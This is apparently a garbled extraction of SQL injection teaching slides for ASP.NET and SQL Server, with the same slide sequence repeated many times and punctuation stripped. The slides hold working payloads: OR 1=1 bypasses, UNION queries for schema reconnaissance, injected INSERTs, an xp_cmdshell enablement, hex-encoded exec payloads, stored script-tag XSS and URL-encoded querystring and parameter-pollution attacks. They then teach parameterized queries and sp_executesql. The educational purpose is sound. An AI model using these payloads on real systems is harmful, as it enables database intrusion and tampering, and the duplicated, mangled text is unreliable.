select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
